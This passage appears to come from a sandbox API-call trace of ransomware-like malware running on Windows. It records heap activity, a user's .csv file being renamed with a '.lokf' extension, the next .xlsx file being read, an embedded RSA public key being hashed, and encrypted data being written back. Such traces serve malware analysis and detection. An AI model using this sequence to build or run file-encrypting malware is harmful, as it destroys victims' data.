returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d58 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d28 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.336] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d28 | out: hHeap=0x660000) returned 1 [0060.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d58 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d10 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cf8 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c890e8 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.338] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0xe21f, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0xe21f, lpOverlapped=0x0) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.338] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe224, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.338] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.338] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.339] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.339] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.339] CloseHandle (hObject=0x5cc) returned 1 [0060.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31e9450 | out: hHeap=0x660000) returned 1 [0060.340] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q4CVm42sPsNlTUJg5b.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q4cvm42spsnltujg5b.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q4CVm42sPsNlTUJg5b.csv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q4cvm42spsnltujg5b.csv.lokf")) returned 1 [0060.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.340] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.341] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276ee7b0, ftCreationTime.dwHighDateTime=0x1d4c739, ftLastAccessTime.dwLowDateTime=0xd5800220, ftLastAccessTime.dwHighDateTime=0x1d4d42d, ftLastWriteTime.dwLowDateTime=0xd5800220, ftLastWriteTime.dwHighDateTime=0x1d4d42d, nFileSizeHigh=0x0, nFileSizeLow=0x9816, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q6NKNt7D.xlsx", cAlternateFileName="Q6NKNT~1.XLS")) returned 1 [0060.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.341] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q6NKNt7D.xlsx") returned=".xlsx" [0060.341] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\Q6NKNt7D.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\q6nknt7d.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.342] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=38934) returned 1 [0060.342] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.344] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x97f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.344] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.345] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.345] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.345] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9816, lpOverlapped=0x0) returned 1 [0060.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.345] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.345] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.346] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.346] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.346] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.346] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.346] GetLastError () returned 0x0 [0060.346] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.346] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.346] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.346] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.346] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9820) returned 0x9c8bae8 [0060.346] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.346] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c890e8 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cf8 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89130 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d10 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d40 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85d58 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.347] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d58 | out: hHeap=0x660000) returned 1 [0060.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.347] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85d58 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85d40 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.347] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d58 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85d40 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.348] GetCurrentThreadId () returned 0x9e0 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a640 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.348] GetCurrentThreadId () returned 0x9e0 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.349] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.349] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9816, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.349] HeapFree (in: hHeap=0x660000, 